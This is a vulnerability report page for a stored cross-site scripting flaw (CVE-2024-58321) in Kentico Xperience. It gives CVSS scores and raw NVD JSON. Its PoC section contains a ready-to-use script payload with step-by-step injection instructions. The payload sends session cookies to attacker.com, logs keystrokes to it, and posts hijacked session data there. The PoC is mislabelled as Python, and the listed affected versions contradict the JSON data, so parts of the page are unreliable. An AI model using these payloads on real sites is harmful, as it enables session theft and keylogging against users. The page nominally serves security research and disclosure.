Security Vulnerability Report
中文
CVE-2024-58321 CVSS 5.4 MEDIUM

CVE-2024-58321

Published: 2025-12-18 20:15:54
Last Modified: 2025-12-27 17:15:46
Source: [email protected]

Description

A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via form validation rule configuration. Attackers can exploit this vulnerability to execute malicious scripts that will run in users' browsers.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE
Kentico Xperience < 13.0.200
Kentico Xperience 13.x < 最新补丁版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2024-58321 - Kentico Xperience Stored XSS PoC // Description: Stored XSS via form validation rule configuration // CVSS: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) // Step 1: Login to Kentico Xperience with low-privilege account // Step 2: Navigate to Form Builder or Validation Rules section // Step 3: Create or edit a validation rule // Step 4: Inject the following XSS payload in validation rule parameter: const xssPayload = ` <script> // Steal session cookies document.write('<img src="https://attacker.com/log?cookie=' + document.cookie + '"/>'); // Alternative payload - keylogger document.addEventListener('keypress', function(e) { fetch('https://attacker.com/keys?k=' + e.key); }); // Session hijacking fetch('https://attacker.com/api/session', { method: 'POST', body: JSON.stringify({ cookie: document.cookie, url: window.location.href }) }); </script> `; // Step 5: Save the validation rule // Step 6: When admin views the form validation rules, XSS executes // Example validation rule injection: const exploitRequest = { method: 'POST', path: '/CMSModules/Forms/Controls/ValidationRule/Edit.aspx', data: { ValidationRuleName: 'CustomValidator', ValidationRuleType: 'Custom', // Inject XSS payload here ErrorMessage: xssPayload, RuleParameters: xssPayload } };

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58321", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:54.080", "lastModified": "2025-12-27T17:15:46.470", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via form validation rule configuration. Attackers can exploit this vulnerability to execute malicious scripts that will run in users' browsers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.0.159", "matchCriteriaId": "529B6DDC-9ADE-4BDB-896A-3D63BB332E85"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-form-validation-stored-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.